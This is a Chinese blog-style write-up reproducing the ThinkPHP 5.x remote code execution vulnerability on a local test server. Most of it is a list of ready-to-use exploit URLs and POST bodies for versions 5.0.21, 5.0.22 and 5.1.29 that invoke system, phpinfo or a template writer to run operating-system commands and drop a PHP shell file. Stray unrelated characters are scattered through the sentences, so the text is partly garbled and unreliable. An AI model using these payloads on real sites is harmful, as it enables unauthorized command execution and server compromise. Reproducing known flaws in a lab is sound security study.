0x1 前言
之前看到大佬們在網(wǎng)上爆出tp遠(yuǎn)程代碼執(zhí)行谱煤,我就想著來復(fù)現(xiàn)一波例衍,所以寫篇文章做個筆記。
0x2漏洞復(fù)現(xiàn)
首先去ThinkPhP官網(wǎng)下載他的一個框架:http://www.thinkphp.cn/down.html
11.png
在這里我選擇的是ThinkPHP5.0.22完整版,大家可以下載其他版本喧锦!
然后使用phpstudy集成環(huán)境搭建Tp5.0.22:
1.png
然后運(yùn)行php環(huán)境昨忆,在這里我選擇的是Apach+PHP5.5n的:
2.png
然后訪問:http://127.0.0.1/cms/public/index.php
3.png
然后在url后面添加:
添加后:http://127.0.0.1/cms/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
打開網(wǎng)頁看看執(zhí)行結(jié)果:
22.png
Success丁频!當(dāng)然這是GET請求的攻擊,我們?nèi)绾斡肞OST請求來執(zhí)行命令呢邑贴?
這時候需要用到火狐瀏覽器的Hackbar:
URL:http://127.0.0.1/cms/public/index.php?s=captcha
Post data:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
然后Excute:
4.png
然后成功執(zhí)行了官撼!ok傀广,筆記就到這拇泣!
下面附上其他payload:
TP版本5.0.21:
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
TP版本5.0.22:
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
TP5.1.*
thinkphp5.1.29為例
1定铜、代碼執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
2、命令執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=操作系統(tǒng)命令
3独旷、文件寫入(寫shell):
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4署穗、未知:
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5寥裂、代碼執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6、命令執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系統(tǒng)命令
7案疲、代碼執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8封恰、命令執(zhí)行:
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系統(tǒng)命令
Power_Liu
Qq:211124332
歡迎大佬找我交流技術(shù)
